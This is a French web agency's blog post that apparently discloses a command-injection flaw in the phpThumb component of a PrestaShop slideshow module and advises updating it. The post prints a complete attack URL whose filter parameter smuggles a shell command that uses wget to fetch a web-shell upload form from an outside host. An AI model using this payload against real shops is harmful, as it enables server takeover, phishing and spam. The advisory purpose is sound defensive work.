Bienvenue sur le site de Rhinoferos, agence de communication globale, web, studio graphique et audiovisuel sur Avignon



NOS ACTIVITÉS
 
rhinoferos.com
actualités rhinoferos.com

rhinoferos.com photos LES INFOS .COM



<< Retour
Faille de sécurité Prestashop
par Pascal SALOU

Après recherches sur internet, cette faille ne semble pas être rendue publique, et à ce stade vérifiée sur une version 1.6.0.9. Nous pensons néanmoins qu'elle ne date pas d'hier.

 

L'attaquant injecte un fichier sur votre serveur dans le répertoire modules/pm_adsandslideshow/phpThumb/ en se servant du code suivant dans l'url de votre domaine (method GET) :

modules/pm_adsandslideshow/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ;wget http://un-domaine-secret.com/libraries/novo/wp.php;&phpThumbDebug=9

 

Nous ne divulgons pas le domaine en gras par mesure de sécurité. Il est d'ailleurs fort probable que les responsables de ce domaine effacent prochainement les fichiers qui permettent l'utilisation de cette faille.

 

Si vous pensez être vulnérable contactez-nous en message privé, nous testerons votre domaine.

 

Le fichier wp.php ainsi déposé est un formulaire d'upload qui permet de charger ensuite ce qu'on veut. Il pourrait porter sans nul doute un autre nom dans votre répertoire, ou se situer ailleurs. La plupart du temps les attaquants uploadent un fichier très connu permettant de prendre le contrôle d'un site, voire d'un serveur en vue de pratiquer phishing, spaming et pharmahack. De quoi vous faire blacklister en quelques minutes.

 

C'est sous la version 1.3.2 du module adsandslideshow que cette faille a été exploitée pour ceux qui l'auraient encore. Comblée par un fix sur la 1.4. Nous recommandons vivement la mise à jour vers la version 1.5.6.



Faille de sécurité Prestashop
 
Consultez d'autres articles
Le responsive design, incontournable pour votre site ? par Pascal SALOU
Le site One-Page marque t-il un élan de modernité ? par Pascal SALOU
Quelques règles de base pour votre futur site internet Par Virgil MALARA
 


Nos actualités

agence de communication Avignon
lire toutes les actualités
 
Création du site Les Momes Trotteurs
Création du site Les Momes Trotteurs
Le site des Momes Trotteurs est en ligne ! Spécialisés dans les voyages scolaires collèges et lycées pour gérer toute…lire la suite
Grande réussite de la société Adap'Table au salon Paris Healtcare Week
Grande réussite de la société Adap'Table au salon Paris Healtcare Week
Notre agence a réalisé le stand de la société Adap'Table, dont nous réalisons toute la communication depuis de longues années,…lire la suite
création logo pour le Collectif Vauclusien de la Protection Animale
création logo pour le Collectif Vauclusien de la Protection Animale
Le Collectif Vauclusien de la Protection Animale est un groupement des principales associations défendant les animaux de la région Vaucluse…lire la suite
brnissandre
réalisation du site de vente en ligne de bijoux Brunissandre
réalisation du site de vente en ligne de bijoux Brunissandre
Julie Ribert vous propose ici ses créations qu'elle réalise dans son atelier situé dans le quartier médiéval de Parthenay en…lire la suite

Nos atouts

agence de communication Avignon
En savoir plus
rhinoferos.com Agence de communication AvignonUne analyse professionelle du projet
Entretien préalable sans engagements de votre part entre le graphiste et le développeur pour établir ensemble un projet cohérent et compétitif
rhinoferos.com Agence de communication AvignonUn site qui vous ressemble
Les pages sont réalisées par un graphiste sans les contraintes d’un gestionnaire de contenu Open source. Propositions, retouches sont faites pour un résultat de qualité
rhinoferos.com Agence de communication AvignonUne visibilité sur le web
Les excellents résultats obtenus en référencement naturel (voir exemples) peuvent être accompagnés de campagnes web que nous mettons en place.
rhinoferos.com Agence de communication AvignonUn suivi de qualité
Vous êtes en contact direct avec le développeur pour une assistance gratuite et illimitée. Nous suivons également l’évolution de votre référencement.

Les infos - com

agence de communication Avignon
Lire toutes les infos

Quelques règles de base pour votre futur site internet

Le site One-Page marque t-il un élan de modernité ?

Faille de sécurité Prestashop



Références et témoignages

agence de communication Avignon
lire la suite
plus de témoignages

M. Stéphane VILLARS, Gérant de la sarl Devill

" C'est un vrai plaisir de travailler ensemble. Ne changez rien à votre professionnalisme, votre confort de travail et de réactivité.

Notre site est très ludique, et fonctionne à merveille. "

rhinoferos.com référence Gard&Golf
rhinoferos.com référence ADPG
rhinoferos.com référence INTERLINK
rhinoferos.com référence Soravim
rhinoferos.com référence L'atelier du grimeur
rhinoferos.com référence L'OUSTALET MAIANEN
rhinoferos.com référence Wine Intelligence
rhinoferos.com référence Espelido
SARL RHINOFEROS - 546, rue Baruch de Spinoza, Bât. Pierre Thomas - 84916 - AVIGNON Cedex 9 Tél. 04 90 27 38 11ContactMentions légalesCGV© Rhinoferos 2015
En poursuivant votre navigation sur ce site, vous acceptez nos CGV et l'utilisation de cookies pour vous proposer des contenus et services adaptés à vos centres d'intérêts et vous permettre l'utilisation de boutons de partages sociaux.
En savoir plus et gérer ces paramètres
Fermer